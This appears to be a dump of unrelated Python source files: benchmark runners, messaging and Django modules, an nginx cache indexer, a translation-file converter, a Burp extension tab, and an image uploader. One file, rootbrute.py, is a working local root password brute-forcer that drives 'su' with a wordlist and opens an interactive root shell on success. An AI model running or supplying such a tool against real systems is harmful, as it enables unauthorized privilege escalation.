benchmark.AddCommandLineOptions(parser)
_, args = parser.parse_args()
if benchmark is None or len(args) != 2:
parser.print_usage()
import page_sets # pylint: disable=F0401
print >> sys.stderr, 'Available benchmarks:\n%s\n' % ',\n'.join(
sorted(benchmarks.keys()))
print >> sys.stderr, 'Available page_sets:\n%s\n' % ',\n'.join(
sorted([os.path.relpath(f)
for f in page_sets.GetAllPageSetFilenames()]))
sys.exit(1)
ps = page_set.PageSet.FromFile(args[1])
benchmark.CustomizeBrowserOptions(options)
possible_browser = browser_finder.FindBrowser(options)
if not possible_browser:
print >> sys.stderr, """No browser found.\n
Use --browser=list to figure out which are available.\n"""
sys.exit(1)
if not options.output_file:
output_file = sys.stdout
elif options.output_file == '-':
output_file = sys.stdout
else:
output_file = open(os.path.expanduser(options.output_file), 'w')
if options.output_format == 'csv':
results = csv_page_benchmark_results.CsvPageBenchmarkResults(
csv.writer(output_file),
benchmark.results_are_the_same_on_every_page)
elif options.output_format in ('block', 'terminal-block'):
results = block_page_benchmark_results.BlockPageBenchmarkResults(
output_file)
else:
raise Exception('Invalid --output-format value: "%s". Valid values are '
'"csv" and "block".'
% options.output_format)
with page_runner.PageRunner(ps) as runner:
runner.Run(options, possible_browser, benchmark, results)
output_trace_tag = ''
if options.output_trace_tag:
output_trace_tag = options.output_trace_tag
elif options.browser_executable:
# When using an exact executable, assume it is a reference build for the
# purpose of outputting the perf results.
# TODO(tonyg): Remove this branch once the perfbots use --output-trace-tag.
output_trace_tag = '_ref'
results.PrintSummary(output_trace_tag)
if len(results.page_failures):
logging.warning('Failed pages: %s', '\n'.join(
[failure['page'].url for failure in results.page_failures]))
if len(results.skipped_pages):
logging.warning('Skipped pages: %s', '\n'.join(
[skipped['page'].url for skipped in results.skipped_pages]))
return min(255, len(results.page_failures))
4,375
smserver/messaging.py
CorySanin/stepmania-server
17
2022832
""" Messaging module
Us to send messages between process and thread
"""
import abc
import queue
from smserver import redis_database
from smserver import event
class Messaging(object):
""" Message class """
def __init__(self, handler=None):
self._handler = handler
def send(self, message):
""" Send a message to all the listener """
if not self._handler:
raise ValueError("No handler configured")
self._handler.send(message)
def listen(self):
""" Listen for incomming messages """
if not self._handler:
raise ValueError("No handler configured")
yield from self._handler.listen()
def set_handler(self, handler):
""" Set the handler to use """
self._handler = handler
def stop(self):
""" Stop the message listener """
if not self._handler:
raise ValueError("No handler configured")
self._handler.stop()
def clear(self):
""" Clear all the message in the listener """
if not self._handler:
raise ValueError("No handler configured")
self._handler.clear()
class MessageHandler(metaclass=abc.ABCMeta):
""" Abstract class for creating new handler """
@abc.abstractmethod
def send(self, message):
""" How the handler handle the message delivery
:param smserver.event.Event message: Message to send
"""
if not isinstance(message, event.Event):
raise ValueError("Messaging only support Event object")
@abc.abstractmethod
def listen(self):
""" How the handler listen for incomming message """
@abc.abstractmethod
def stop(self):
""" Stop the listener """
def clear(self):
""" Clear the element (if needed) """
class PythonHandler(MessageHandler):
""" Python handler use when using the server in only one process """
def __init__(self):
self._queue = queue.Queue()
def send(self, message):
""" Send the message to the queue """
super().send(message)
self._queue.put(message)
def listen(self):
""" Process message from the queue """
while True:
message = self._queue.get()
if message is None:
break
yield message
self._queue.task_done()
def stop(self):
""" Stop the listener by adding a None element to the queue """
self._queue.put(None)
def clear(self):
""" Clear all the element in the queue (use in test) """
with self._queue.mutex:
self._queue.queue.clear()
class RedisHandler(MessageHandler):
""" Redis Handler. Use pub/sub mechanism """
def __init__(self, channel="socka"):
self.connection = redis_database.new_connection()
self.pubsub = self.connection.pubsub(
ignore_subscribe_messages=True
)
self.channel = channel
self._continue = False
def send(self, message):
""" Send a message through a redis chanel """
super().send(message)
self.connection.publish(self.channel, message.encode())
def listen(self):
""" Listen for message comming through redis """
self._continue = True
self.pubsub.subscribe(self.channel)
while self._continue:
message = self.pubsub.get_message(timeout=0.01)
if not message or message["type"] != "message":
continue
yield event.Event.decode(message["data"])
self.pubsub.unsubscribe(self.channel)
self.pubsub.close()
def stop(self):
""" Stop the listener by adding a None element to the queue """
self._continue = False
_MESSAGING = Messaging()
def set_handler(handler):
""" Add an handler to the global message class """
_MESSAGING.set_handler(handler)
def send(message):
""" Send a message with the global message class """
_MESSAGING.send(message)
def send_event(kind, data=None, token=None, room_id=None):
""" Send an event with the global message class """
_MESSAGING.send(event.Event(
kind=kind,
data=data,
token=token,
room_id=room_id
))
def listen():
""" Listen for message with the global message class """
yield from _MESSAGING.listen()
def stop():
""" Stop to listen """
_MESSAGING.stop()
def clear():
""" Clear all the messages"""
_MESSAGING.clear()
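# Illustrative usage sketch (handler choice and event fields are assumptions, not from this file):
#   set_handler(PythonHandler())
#   send_event("chat.message", data={"text": "hello"}, room_id=1)
#   for message in listen():      # yields smserver.event.Event objects until stop() is called
#       ...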
4,523
thing/models/serverstatus.py
skyride/evething-2
21
2022953
from django.db import models
class ServerStatus(models.Model):
online = models.BooleanField(default=False)
players = models.IntegerField(default=0)
start_time = models.DateTimeField()
server_version = models.IntegerField()
class TokenNotFound(ValueError):
...
class Parser:
def __init__(self, tokens):
self.date = None
self.tokens = tokens
self.current_token = 0
self.sections = {}
self.parse()
def expect(self, expected):
the_token = self.tokens[self.current_token]
if the_token != expected:
raise TokenNotFound(
f"Unexpected token: {repr(the_token)} at position {self.current_token}"
)
self.current_token += 1
return the_token
def advance_newline(self):
while self.peek() in {" ", "\n"}:
self.current_token += 1
def advance_whitespace(self):
while self.peek() == " ":
self.current_token += 1
def peek(self):
return self.tokens[self.current_token]
def consume(self):
next_token = self.tokens[self.current_token]
self.current_token += 1
return next_token
def expect_tokens(self, tokens):
result = []
for token in tokens:
result.append(self.expect(token))
return result
def parse_header(self):
self.advance_whitespace()
self.expect_tokens("```asciidoc")
self.advance_newline()
def consume_until(self, token):
tokens = []
while self.peek() != token:
tokens.append(self.consume())
return "".join(tokens)
def parse_date(self):
self.advance_whitespace()
self.expect("[")
date = self.consume_until("]")
self.expect("]")
self.advance_newline()
return date
def parse_section(self):
self.advance_whitespace()
# Parse section header
try:
self.expect("=")
except TokenNotFound:
return None
section = self.consume_until("=").strip()
self.expect("=")
self.advance_newline()
items = []
while True:
new_item = self.parse_item()
if not new_item:
break
items.append(new_item)
return (section, items)
def parse_item(self):
try:
self.expect("-")
except TokenNotFound:
return None
self.advance_whitespace()
item = self.consume_until("\n")
self.advance_newline()
return item
def parse_footer(self):
self.advance_whitespace()
self.expect_tokens("```")
def parse(self):
self.parse_header()
self.date = self.parse_date()
while True:
section = self.parse_section()
if not section:
break
section_name, items = section
self.sections[section_name] = items
self.parse_footer()
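# Illustrative usage sketch (the input format is inferred from the parse_* methods above,
# it is not taken from the original source):
#   text = "```asciidoc\n[2022-01-01]\n= Changes =\n- first item\n```"
#   parser = Parser(list(text))
#   parser.date      -> "2022-01-01"
#   parser.sections  -> {"Changes": ["first item"]}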
2,772
create_indexes.py
zafergurel/nginx-cache-cleaner
8
2024548
#!/usr/bin/env python3
'''Nginx Cache Index Generator
Creates index files for each nginx cache folder
'''
import os
import subprocess
import datetime
import sys
# Script parameters
cache_folder = "/cache"
index_folder = "/cache/_cacheindex"
default_cache_duration = 30
current_dir = os.path.dirname(os.path.realpath(__file__))
index_creator_script = current_dir + "/bin/create_index.sh"
dir_empty_check_script = current_dir + "/bin/is_empty_dir.sh"
def create_indexes(op_mode="append"):
'''Creates index files for each nginx cache folder.
op_mode can be append or create
In "append" mode, index file creation dates are checked and only
recently added cache files are added to index file.
In "create" mode index files are re-created.
Default mode is append.
'''
if op_mode != "append" and op_mode != "create":
op_mode = "append"
if not os.path.exists(index_folder):
subprocess.Popen(["mkdir", "-p", index_folder]).wait()
folders = get_folders(cache_folder)
for f in folders:
index_file = index_folder + "/" + f.replace("/", "_") + ".ind"
delta = -1 * default_cache_duration
if os.path.exists(index_file) and op_mode == "append":
            # get the index file's last modification time
ctime = datetime.datetime.fromtimestamp(os.stat(index_file).st_mtime)
delta = -1 * round((datetime.datetime.now() - ctime).seconds / 3600 / 24, 2)
# delta cannot be less than default duration
if delta < -1 * default_cache_duration:
delta = -1 * default_cache_duration
if delta < 0:
print("Cache operation: "+ op_mode + " -> " + f + " (" + str(delta) + " days)")
subprocess.Popen([index_creator_script, op_mode, f, index_file, str(delta)]).wait()
def is_empty_dir(dir_path):
'''Checks whether a directory is empty or not
'''
result = "0"
with subprocess.Popen([dir_empty_check_script, dir_path],stdout=subprocess.PIPE) as proc:
result = proc.stdout.read().decode().strip()
return result == "1"
def get_folders(base_folder):
'''Returns all the folders (except index_folder) under
cache folder.
'''
folders = []
for root, dirs, _ in os.walk(base_folder):
for dir in dirs:
full_path = root + "/" + dir
if full_path != index_folder and not is_empty_dir(full_path):
folders.append(full_path)
return folders
if __name__ == "__main__":
op_mode = sys.argv[1] if len(sys.argv) > 1 else "append"
create_indexes(op_mode)
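# Usage sketch (cache_folder and index_folder are the defaults defined at the top of this script):
#   ./create_indexes.py           append recently added cache files to the existing index files
#   ./create_indexes.py create    rebuild every index file from scratch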
2,578
examples/demo.py
christophevg/py-mqfactory
0
2024515
import time
import socket
# The core of the factory allows for instantiating a `MessageQueue`. Such an MQ
# has an inbox and an outbox, which can be processed using the `process_inbox`
# and `process_outbox` methods (or the `send_and_receive` method). To automate
# this we can apply `Threaded` to the MQ to automate calling these methods.
from mqfactory import Threaded, MessageQueue
# An MQ needs at least a way to send its message, this is a `Transport`. Here we
# use an MQTT implementation.
from mqfactory.transport.mqtt import MQTTTransport
# One aspect of transporting messages is how much care is taken in making sure
# they are delivered. This is often called quality of service and can take many
# forms. Here we choose to retry sending messages untill they are acknowledged.
from mqfactory.transport.qos import Acknowledging
# An MQ takes any payload and will pass it as-is. Here we choose to have the
# payload formatted using JSON, taking care of serializing and deserializing.
from mqfactory.message.format.js import JsonFormatting
# A standard MQ will hold its messages in a `Queue` in memory. Using a
# `Collection` in a `Store` we can persist these, e.g. to a `MongoStore`.
from mqfactory.store import Persisting
from mqfactory.store.mongo import MongoStore
# Let's use a localy running MongoDB instance:
mongo = MongoStore("mongodb://localhost:27017/mqfactory")
# Beside formatting it using JSON, we also choose to have our payload signed and
# validated using a public/private keypair. Keys for these signatures are also
# storable in a `Collection` in a `Store`, such as the `MongoStore`.
from mqfactory.message.security import Signing
from mqfactory.message.security.rsa import RsaSignature
# Since we want to sign our messages, we need to provision a keypair.
from mqfactory.message.security.rsa import generate_key_pair, encode
private, public = generate_key_pair()
# We store the keypair in a MongoDB collection(keys) and identify the pair by
# our hostname, which is the default used by MQFactory.
HOSTNAME = socket.gethostname()
mongo["keys"].remove(HOSTNAME)
mongo["keys"].add({
"_id": HOSTNAME,
"private": encode(private),
"public" : encode(public)
})
# Now we can finally assemble all these components into our own specific MQ,
# adding layer after layer:
mq = JsonFormatting(
Signing(
Acknowledging(
Persisting(
Threaded(
MessageQueue(
MQTTTransport("mqtt://localhost:1883")
)
),
inbox=mongo["inbox"],
outbox=mongo["outbox"]
)
),
adding=RsaSignature(mongo["keys"])
)
)
# When receiving a message, just print it to the console...
def show(msg):
    print("received {0} from {1}, tagged with {2}".format(
        msg.payload, msg.to, msg.tags
    ))
# Subscribe to incoming messages addressed to myself and handle them with show.
mq.on_message("myself", show)
# Finally, send a message ... to myself.
mq.send("myself", "a message")
time.sleep(1) # to make sure we receive the answer ;-)
3,163
modoboa/transport/models.py
Arvedui/modoboa
2
2024317
# -*- coding: utf-8 -*-
"""Transport models."""
from __future__ import unicode_literals
import jsonfield
from reversion import revisions as reversion
from django.db import models
from django.utils.translation import ugettext_lazy as _
from . import backends
class Transport(models.Model):
"""Transport table."""
pattern = models.CharField(
_("pattern"), unique=True, max_length=253, db_index=True)
service = models.CharField(_("service"), max_length=30)
next_hop = models.CharField(_("next hop"), max_length=100, blank=True)
_settings = jsonfield.JSONField(default={})
class Meta:
ordering = ["pattern"]
def __str__(self):
return self.pattern
@property
def backend(self):
"""Shortcut to access backend."""
if not self.service:
return None
return backends.manager.get_backend(self.service)
reversion.register(Transport)
cache = {}
def stepPerms(n):
if n == 0:
return 1
if n in cache:
return cache[n]
with_one = with_two = with_three = 0
if n >= 1:
with_one = stepPerms(n-1)
if n >= 2:
with_two = stepPerms(n-2)
if n >= 3:
with_three = stepPerms(n-3)
cache[n] = with_one + with_two + with_three
return cache[n]
if __name__ == "__main__":
print(stepPerms(7))
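# Illustrative check (not part of the original file): stepPerms(3) == 4, since a 3-step
# staircase can be climbed as 1+1+1, 1+2, 2+1 or 3; the cache dict memoises each
# sub-result so stepPerms(n) only computes every value once.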
420
inql/burp_ext/generator_tab.py
AmesCornish/inql
0
2023338
from __future__ import print_function
import platform
if platform.system() != "Java":
print("Load this file inside jython, if you need the stand-alone tool run: inql")
exit(-1)
import json
from burp import ITab
from inql.actions.sendto import RepeaterSenderAction, OmniMenuItem, EnhancedHTTPMutator, GraphiQLSenderAction
from inql.actions.setcustomheader import CustomHeaderSetterAction
from inql.widgets.generator import GeneratorPanel
class GeneratorTab(ITab):
"""
Java GUI
"""
def __init__(self, callbacks, helpers):
self._callbacks = callbacks
self._helpers = helpers
def getTabCaption(self):
"""
Override ITab method
:return: tab name
"""
return "InQL Scanner"
def getUiComponent(self):
"""
Override ITab method
:return: Tab UI Component
"""
overrideheaders = {}
repeater_omnimenu = OmniMenuItem(callbacks=self._callbacks, helpers=self._helpers, text="Send to Repeater")
graphiql_omnimenu = OmniMenuItem(callbacks=self._callbacks, helpers=self._helpers, text="Send to GraphiQL")
http_mutator = EnhancedHTTPMutator(
callbacks=self._callbacks, helpers=self._helpers, overrideheaders=overrideheaders)
repeater_sender = RepeaterSenderAction(omnimenu=repeater_omnimenu, http_mutator=http_mutator)
graphiql_sender = GraphiQLSenderAction(omnimenu=graphiql_omnimenu, http_mutator=http_mutator)
custom_header_setter = CustomHeaderSetterAction(overrideheaders=overrideheaders, text="Set Custom Header")
try:
restore = self._callbacks.loadExtensionSetting(GeneratorPanel.__name__)
except Exception as ex:
print("Cannot restore state! %s" % ex)
restore = None
proxy = None
for request_listener in json.loads(self._callbacks.saveConfigAsJson())["proxy"]["request_listeners"]:
if request_listener["running"]:
proxy = "localhost:%s" % request_listener["listener_port"]
break
self.panel = GeneratorPanel(
actions=[
repeater_sender,
graphiql_sender,
custom_header_setter],
restore=restore,
proxy=proxy,
http_mutator=http_mutator,
texteditor_factory=self._callbacks.createTextEditor
)
self._callbacks.customizeUiComponent(self.panel.this)
return self.panel.this
def bring_in_front(self):
self.panel.this.setAlwaysOnTop(True)
self.panel.this.setAlwaysOnTop(False)
def save(self):
"""
Save Extension State before exiting
:return: None
"""
try:
self._callbacks.saveExtensionSetting(self.panel.__class__.__name__, self.panel.state())
except:
print("Cannot save state!")
2,902
File Conversion/convert_offline_case.py
mewturn/Python
0
2023977
class OfflineCase:
def __init__(self, filename):
self.filename = filename
self.output_filename = filename.split(".")[0]
self.parseSegments()
def parseSegments(self):
import openpyxl
self.segments = []
wb = openpyxl.load_workbook(self.filename)
for sheetname in wb.sheetnames:
sheet = wb[sheetname]
i = 4
while True:
id = sheet[f"A{i}"].value
source = sheet[f"B{i}"].value
if id is not None and source is not None:
target = sheet[f"C{i}"].value
if target is None:
target = ""
self.segments.append(Segment(id, source, target))
i += 1
else:
break
def convert(self, ext):
        # map the chosen extension to its converter and only call the one that was selected
        ext_map = {
            "tmx": self.convertTMX,
            "xliff": self.convertXLIFF
        }
        output_filename = f"{self.output_filename}.{ext}"
        header, body, footer = ext_map[ext]()
with open(output_filename, "w", encoding="utf-8") as f:
f.write(header)
f.write(body)
f.write(footer)
def convertTMX(self):
header = "<?xml version='1.0' encoding='UTF-8'?>\n"
header += "<tmx version='1.4'>\n"
header += "<header adminlang='en' creationtool='WritePath Translation Editor' creationtoolversion='1.0' datatype='tbx' o-tmf='unknown' segtype='block'/>\n"
header += "<body>\n\n"
body = ""
if self.segments:
for segment in self.segments:
body += f"<tu origin='tbx' tuid='{segment.id}'>\n"
body += "<tuv xml:lang='zh-TW'>\n"
body += f"<seg>{segment.source}</seg>\n"
body += "</tuv>\n"
body += "<tuv xml:lang='en'>\n"
body += f"<seg>{segment.target}</seg>\n"
body += "</tuv>\n"
body += "</tu>\n\n"
footer = "</body>\n"
footer += "</tmx>\n"
return header, body, footer
def convertXLIFF(self):
header = "<?xml version='1.0' encoding='UTF-8'?>\n"
header += "<xliff version='1.2' xmlns='urn:oasis:names:tc:xliff:document:1.2'>\n"
header += "<file original='writepath-case112066' datatype='plaintext' source-language='zh-TW' target-language='en'>\n"
header += "<body>\n\n"
body = ""
if self.segments:
for segment in self.segments:
body += f"<trans-unit id='{segment.id}'>\n"
body += f"<source id='{segment.id}'>{segment.source}</source>\n"
body += f"<target id='{segment.id}' state='translated'>{segment.target}</target>\n"
body += "</trans-unit>\n\n"
footer = "</body>\n"
footer += "</file>\n"
footer += "</xliff>\n"
return header, body, footer
class Segment:
def __init__(self, id, source, target):
self.id = id
self.source = self.cleanStringForXML(source)
self.target = self.cleanStringForXML(target)
def cleanStringForXML(self, text, reverse=False):
        find_and_replace = {
            "&": "&amp;",
            "\"": "&quot;",
            "'": "&apos;",
            "<": "&lt;",
            ">": "&gt;"
        }
text = str(text)
for k, v in find_and_replace.items():
if reverse:
text = text.replace(v, k)
else:
text = text.replace(k, v)
return text.strip()
if __name__ == "__main__":
import os
import time
ext_num = input("Select output format - [1]: TMX, [2]: XLIFF\nEnter number: ")
ext_map = {
"1": "tmx",
"2": "xliff"
}
try:
for i in os.listdir():
if ".xlsx" in i:
start_time = time.time()
print(f"Processing file {i}")
offline_case = OfflineCase(i)
offline_case.convert(ext_map[ext_num])
elapsed_time = round(time.time() - start_time, 2)
print(f"Success! Completed in {elapsed_time} seconds.")
input("Task completed. Press <Enter> to close this window.")
except Exception as e:
input(f"An error occurred. {repr(e)}. Press <Enter> to close this window.")
#!/usr/bin/env python3
from math import sqrt
def solution(n):
"""
Returns the minimal perimeter for a rectangle of area n.
"""
# given the sides a and b, the area of a rectangle is n = a*b and the perimeter is 2 * (a + b)
# for a minimal perimeter, we have to minimize the difference between a and b
for i in range(int(sqrt(n)), 0, -1):
# a and b must be the closest possible to sqrt(n)
if n % i == 0:
return 2*(i + n//i)
453
rootbrute.py
lucthienphong1120/full-45-bruteforce-tools
1
2023280
#!/usr/bin/python
#Local Root BruteForcer
#More Info: http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=1571
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys
try:
import pexpect
except(ImportError):
print "\nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpect\n"
sys.exit(1)
#Change this if needed.
LOGIN_ERROR = 'su: incorrect password'
def brute(word):
print "Trying:",word
child = pexpect.spawn ('su')
child.expect ('Password: ')
child.sendline (word)
i = child.expect (['.+\s#\s',LOGIN_ERROR])
if i == 0:
print "\n\t[!] Root Password:",word
child.sendline ('whoami')
print child.before
child.interact()
#if i == 1:
#print "Incorrect Password"
if len(sys.argv) != 2:
print "\nUsage : ./rootbrute.py <wordlist>"
print "Eg: ./rootbrute.py words.txt\n"
sys.exit(1)
try:
words = open(sys.argv[1], "r").readlines()
except(IOError):
print "\nError: Check your wordlist path\n"
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
brute(word.replace("\n",""))
import os, time, sys
from Plugins.Configs.Settings import *
def Updates_Page():
print(Dark_Blue + BG_Dark_Green + Line + Rest)
clearConsole()
Index_Banner()
for char in Banner_msg:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.0)
print(Dark_Blue + BG_Dark_Green + "")
for char in Line:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.500)
print(Rest + Bright_Green + BG_Dark_Blue)
for char in Endl:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.0)
print(Rest +"")
print(Bright_Yellow)
Auto_Text_15 = "Updates"
for char in Auto_Text_15:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
#The Org Message
print(Bright_Yellow)
Auto_Text_11 = "The Organization Updates"
for char in Auto_Text_11:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
print(Dark_Cyan)
Auto_Text_12 = "Date: 20/02/2022 Updates"
for char in Auto_Text_12:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print("")
    print(Bright_Green +"The Org has finally reached its own level of\n\
trust with its members to share and make use of this script. This Script")
    print("Contains The Org data, as our members\n\
agreed to share their public cryptic info through the BlackDoc")
    print(Bright_Red +"Please Note: All information in this\n\
document is classified and must not be shared\n\
with non-members of The Org")
    print("Make sure you don't share this script!")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
#New Members Updates
print(Bright_Yellow)
Auto_Text_13 = "New Members List"
for char in Auto_Text_13:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
print(Dark_Cyan)
Auto_Text_14 = "Date: 21/03/2022 Updates "
for char in Auto_Text_14:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print("")
    print(Dark_Magenta + Ms1 + Bright_Red +". There Are No New Members...")
    print(Bright_Green +"Use Menu -> Then Command; 'Memberships'\n\
To See The Full Memberships Board.")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
#About The BlackDoc
print(Bright_Yellow)
Auto_Text_17 = "About BlackDoc Updates"
for char in Auto_Text_17:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
print(Bright_Cyan)
Auto_Text_16 = "Date: 22/02 - 01/03/2022 Updates"
for char in Auto_Text_16:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print()
print(Bright_Green +"About The Script.")
print("You using;")
print("Name: BlackDocument.py")
print("Version: V0.0.03")
print("Security Level: "+ Ms1 + ".03")
print("Developed By: CHHOrg")
print("Promoted By: DarkDoor")
print("Released Date: 20/02/2022")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Yellow)
Auto_Text_18 = "Errors, Fixed Errors and New Features\n\
Updates"
for char in Auto_Text_18:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.1)
print("")
print(Dark_Cyan)
Auto_Text_10 = "Date: 21/02/2022 Updates\n\
[(Old Version)]"
for char in Auto_Text_10:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print("")
print(Bright_Red)
Auto_Text_9 = "[+] -> FIXED Errors"
for char in Auto_Text_9:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Fixed all spelling errors")
print(Bright_Magenta + Ms2 + Bright_Green +"). Fixed all cutting words")
print(Bright_Magenta + Ms3 + Bright_Green +"). Fixed underlinings Lan")
print(Bright_Magenta + Ms4 + Bright_Green +"). Fixed underlining divisions")
print("for each page in our Menu")
print(Bright_Magenta + Ms5 + Bright_Green +"). Fixed directory folder in Zip")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red)
Auto_Text_8 = "[+] -> New Features"
for char in Auto_Text_8:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). We added Colors")
print(Bright_Magenta + Ms2 + Bright_Green +"). We added Banner")
print(Bright_Magenta + Ms3 + Bright_Green +"). We added more error messages")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Cyan + "")
Auto_Text_7 = "Date: 22/02 - 01/03/2022 Updates\n\
([Previous Version])"
for char in Auto_Text_7:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print(Bright_Red + "")
Auto_Text_6 = "[+] -> FIXED Errors"
for char in Auto_Text_6:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Fixed Menu Borders")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red + "")
Auto_Text_5 = "[+] -> New Features"
for char in Auto_Text_5:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). We added new menu items")
print(Bright_Magenta + Ms2 + Bright_Green +"). We added script animation")
print(Bright_Magenta + Ms3 + Bright_Green +"). We added new security for exits")
print(Bright_Magenta + Ms4 + Bright_Green +"). We added a Bot")
print(Bright_Magenta + Ms5 + Bright_Green +"). We added Commands")
print(Bright_Magenta + Ms6 + Bright_Green +"). We added Org Rules at More. in Menu")
print(Bright_Magenta + Ms7 + Bright_Green +"). We added Loading Progress")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red +"")
Auto_Text_4 = "[+] -> Errors"
for char in Auto_Text_4:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Chat Option in Menu for Termux/Linux\n\
Is not working!!!\n\
\n\
Note: In Termux we run TermuxRun.sh after\n\
Installations.")
    print(Bright_Magenta + Ms2 + Bright_Green +"). Other Items in the Menu are\n\
Unavailable")
    print(Bright_Magenta + Ms3 + Bright_Green +"). The script is still under Development")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Cyan + "")
Auto_Text_7 = "Date: 01/03 - 21/03/2022 Updates\n\
([New Version])"
for char in Auto_Text_7:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.3)
print(Bright_Red + "")
Auto_Text_6 = "[+] -> FIXED Errors"
for char in Auto_Text_6:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Fixed Login Security")
print(Bright_Magenta + Ms2 + Bright_Green +"). Fixed More Menu Logout System")
print(Bright_Magenta + Ms3 + Bright_Green +"). Fixed Directory Of Game; EvilNinja")
    print(Bright_Magenta + Ms4 + Bright_Green +"). Fixed Updates Page (Updates Numbering)")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red + "")
Auto_Text_5 = "[+] -> New Features"
for char in Auto_Text_5:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). We added loop")
    print(Bright_Magenta + Ms2 + Bright_Green +"). We changed colors")
print(Bright_Magenta + Ms3 + Bright_Green +"). We advanced login security")
print(Bright_Magenta + Ms4 + Bright_Green +"). We added a game called EvilNinja")
print(Bright_Magenta + Ms5 + Bright_Green +"). We modified the program")
print(Bright_Magenta + Ms6 + Bright_Green +"). We made more menu items available")
print(Bright_Magenta + Ms7 + Bright_Green +"). Hacking Lessons Will Be Available\n\
Date; 01/04/2022")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Bright_Red +"")
Auto_Text_4 = "[+] -> Errors"
for char in Auto_Text_4:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(0.5)
print("")
print(Bright_Magenta + Ms1 + Bright_Green +"). Chat Option in Menu for Termux/Linux\n\
Is not working!!!\n\
\n\
Note: BlackDoc Might Be In Github\n\
But Is Still Under developing.")
    print(Bright_Magenta + Ms2 + Bright_Green +"). Other Items in the Menu are\n\
Unavailable")
    print(Bright_Magenta + Ms3 + Bright_Green +"). The script is still under Development")
print(Dark_Blue + BG_Dark_Green + Line + Rest)
print(Dark_Blue + BG_Dark_Green + Line + Rest)
9,158
src/moz_image/main.py
mozkzki/moz-image
0
2024489
import os
import sys
import uuid
import requests
from contextlib import contextmanager
from dotenv import load_dotenv
from PIL import Image as pimage
GYAZO_UPLOAD_URL = "https://upload.gyazo.com/api/upload"
@contextmanager
def download(url: str):
image = _download_image(url)
save_file_path = _save_image(image)
try:
yield save_file_path
finally:
os.remove(save_file_path)
def _download_image(url: str, timeout: int = 10) -> bytes:
response = requests.get(url, allow_redirects=False, timeout=timeout)
if response.status_code != 200:
e = Exception("HTTP status: " + str(response.status_code))
raise e
content_type = response.headers["content-type"]
if "image" not in content_type:
e = Exception("Content-Type: " + str(content_type))
raise e
return response.content
def _make_save_file_path() -> str:
file_name = str(uuid.uuid4())
save_file_path = os.path.join("/tmp/mmimage/", file_name)
return save_file_path
def _save_image(image: bytes) -> str:
save_file_path = _make_save_file_path()
    # create the directory if it does not exist
os.makedirs(os.path.dirname(save_file_path), exist_ok=True)
with open(save_file_path, "wb") as fout:
fout.write(image)
return save_file_path
def resize(path: str, *, width: int = 302) -> None:
if os.path.isfile(path) is not True:
print("file does not exists. path={}".format(path), file=sys.stderr)
return
img = pimage.open(path)
    # build the destination file name
    # saving fails without an explicit format, so append the original format to the name
new_path = "".join((path, ".", img.format))
    # get the image resolution and compute the height to resize to
img_width, img_height = img.size
resize_width = float(width)
resize_height = resize_width / img_width * img_height
    # resize the image
img = img.resize((int(resize_width), int(resize_height)))
img.save(new_path)
    # swap the resized file in for the old one
os.remove(path)
os.rename(new_path, path)
def upload_to_gyazo(path: str, access_token: str = None) -> str:
image = open(path, "rb")
files = {"imagedata": image}
# files = {"imagedata": ("filename", image, "image")}
    # if no access token was passed in, read it from the environment
if access_token is None:
load_dotenv(verbose=True)
access_token = os.environ.get("gyazo_access_token", "dummy_token")
data = {"access_token": access_token}
response = requests.post(GYAZO_UPLOAD_URL, files=files, data=data)
if response.reason == "Unauthorized" and response.status_code == 401:
print(
"[error] gyazo access token is invalid!",
"please set correct token by environment variable <gyazo_access_token>.",
)
return ""
url = response.json()["url"]
print("------------- URL: ", url)
return url
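# Illustrative usage sketch (the URL and token are placeholders, not from this file):
#   with download("https://example.com/picture.png") as path:
#       resize(path, width=302)
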